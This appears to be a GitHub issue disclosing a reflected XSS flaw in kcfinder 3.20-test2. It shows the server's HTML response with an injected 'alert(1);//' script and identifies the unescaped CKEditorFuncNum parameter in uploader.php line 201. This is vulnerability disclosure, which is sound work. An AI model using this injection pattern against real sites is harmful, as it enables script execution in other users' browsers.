<html><body><script type='text/javascript'>
var par = window.parent,
op = window.opener,
o = (par && par.CKEDITOR) ? par : ((op && op.CKEDITOR) ? op : false);
if (o !== false) {
if (op) window.close();
o.CKEDITOR.tools.callFunction();}</script><script>alert(1);//, '', 'You don\'t have permissions to upload files.');
} else {
alert('You don\'t have permissions to upload files.');
if (op) window.close();
}
</script></body></html>
Vulnerable code
in file core\class\uploader.php line 201
I discovered XSS vulnerability in kcfinder version 3.20-test2.
Payload
Response
Vulnerable code
in file core\class\uploader.php line 201
a var $_GET['CKEditorFuncNum']) was not escape by htmlentities().
The text was updated successfully, but these errors were encountered: